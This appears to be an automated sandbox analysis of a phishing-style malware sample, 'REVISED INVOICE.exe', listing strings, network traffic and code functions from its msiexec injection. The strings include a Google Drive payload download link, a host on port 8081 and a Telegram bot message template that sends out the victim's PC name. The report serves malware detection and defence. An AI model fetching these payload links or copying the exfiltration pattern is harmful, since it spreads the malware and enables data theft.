          Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.628918047.0000000021E7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: REVISED INVOICE.exe, REVISED INVOICE.exe.3.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
          Source: msiexec.exe, 00000005.00000002.629157566.00000000221EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
          Source: powershell.exe, 00000003.00000002.480576580.0000000002531000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/t
          Source: msiexec.exe, 00000005.00000002.625278649.0000000000500000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000005.00000002.625215938.00000000003DC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
          Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.714
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/favicon.ico
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=net
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=wmf
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/sorry/index
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
          Source: msiexec.exe, 00000005.00000002.629514463.00000000232EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023238000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023346000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002330E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023292000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002325A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/sorry/indextest
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
          Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
          Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
          Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknown | HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_004052BD

          System Summary

          Source: initial sample | Static PE information: Filename: REVISED INVOICE.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_0040326A
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | File created: C:\Windows\resources\0409
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21582E225_2_21582E22
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215804D85_2_215804D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215872D85_2_215872D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215890D85_2_215890D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215844DA5_2_215844DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E6DA5_2_2158E6DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215832C85_2_215832C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215804C85_2_215804C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215872C85_2_215872C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215890CA5_2_215890CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A8C05_2_2158A8C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215824F05_2_215824F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215844E85_2_215844E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158E6E85_2_2158E6E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158CEEF5_2_2158CEEF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D8905_2_2158D890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215880905_2_21588090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C0975_2_2158C097
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158D8805_2_2158D880
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215832BA5_2_215832BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215852B05_2_215852B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158A8B05_2_2158A8B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C0A85_2_2158C0A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215812A05_2_215812A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215880A05_2_215880A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215852A05_2_215852A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C7D405_2_215C7D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C19405_2_215C1940
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C4B405_2_215C4B40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C03605_2_215C0360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C35605_2_215C3560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C67605_2_215C6760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C77005_2_215C7700
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C13005_2_215C1300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C45005_2_215C4500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C93205_2_215C9320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C2F205_2_215C2F20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C61205_2_215C6120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C89C05_2_215C89C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C25C05_2_215C25C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C57C05_2_215C57C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5DEF5_2_215C5DEF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C73E05_2_215C73E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C0FE05_2_215C0FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C41E05_2_215C41E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C83805_2_215C8380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C1F805_2_215C1F80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C51805_2_215C5180
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C89B05_2_215C89B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C09A05_2_215C09A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C3BA05_2_215C3BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C6DA05_2_215C6DA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C96405_2_215C9640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C00405_2_215C0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C32405_2_215C3240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C64405_2_215C6440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C38705_2_215C3870
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C80605_2_215C8060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C1C605_2_215C1C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C4E605_2_215C4E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C90005_2_215C9000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C2C005_2_215C2C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5E005_2_215C5E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C96305_2_215C9630
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C64325_2_215C6432
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C7A205_2_215C7A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C16205_2_215C1620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C48205_2_215C4820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C8CD05_2_215C8CD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C70C05_2_215C70C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C0CC05_2_215C0CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C3EC05_2_215C3EC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C8CE05_2_215C8CE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C28E05_2_215C28E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C5AE05_2_215C5AE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C06805_2_215C0680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C38805_2_215C3880
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C6A805_2_215C6A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C86A05_2_215C86A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C22A05_2_215C22A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215C54A05_2_215C54A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169A5E85_2_2169A5E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169CB685_2_2169CB68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216913605_2_21691360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E1485_2_2169E148
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169AF485_2_2169AF48
